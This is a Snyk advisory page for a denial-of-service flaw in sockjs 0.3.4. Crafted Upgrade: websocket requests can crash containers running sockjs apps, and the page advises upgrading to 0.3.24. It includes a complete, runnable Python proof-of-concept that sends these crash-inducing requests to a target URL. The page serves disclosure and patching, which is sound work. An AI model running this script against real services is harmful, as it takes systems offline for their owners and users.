org.webjars.npm:sockjs@0.3.4 vulnerabilities

  • latest version

    0.3.24

  • latest non vulnerable version

  • first published

    9 years ago

  • latest version published

    2 years ago

  • licenses detected

  • package manager

  • Direct Vulnerabilities

    Known vulnerabilities in the org.webjars.npm:sockjs package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Denial of Service (DoS)

    org.webjars.npm:sockjs is a JavaScript library (for browsers) that provides a WebSocket-like object.

    Affected versions of this package are vulnerable to Denial of Service (DoS). Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps.

    PoC by Andrew Snow

    import requests
    import random
    import argparse
    
    def main():
      print('SockJS 0.3.19 Denial of Service POC')
      print('For educational purposes only')
      print('Author: @andsnw')
      print('------------')
      parser = argparse.ArgumentParser(description='SockJS 0.3.19 Denial of Service POC')
      parser.add_argument('--target', type=str, help='URL of target running vulnerable sockjs')
      parsed = parser.parse_args()
      target = vars(parsed)['target']
      if target == None:
        parser.print_help()
        exit()
    
      # Clean trailing /
      if target.endswith('/'):
        target = target[:-1]
    
      print ("Initiating at: %s" % target)
    
      # Create sockjs payload
      payloads = [
        ('%s/sockjs/' % target),
        ('%s/sockjs/598/' % target),
        ('%s/sockjs/598/8ko8gkpf/' % target),
      ]
    
      # Run 3 times with traversion
      for url in payloads:
        payload_url = "%s%s" % (url, random.randint(1000000000000000000,9999999999999999999))
        print('Requesting: %s' % payload_url)
        req = requests.get(url=payload_url, headers={
          'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
          'Cache-Control': 'max-age=0',
          'Accept-Language': 'en-US,en;q=0.5',
          'Connection': 'Upgrade',
          'Upgrade': 'websocket',
        })
        print("Status code: %s" % req.status_code)
    
      print ("Complete! Check if the container has crashed")
    
    if __name__ == "__main__":
        main()
    

    How to fix Denial of Service (DoS)?

    Upgrade org.webjars.npm:sockjs to version 0.3.24 or higher.

    [,0.3.24)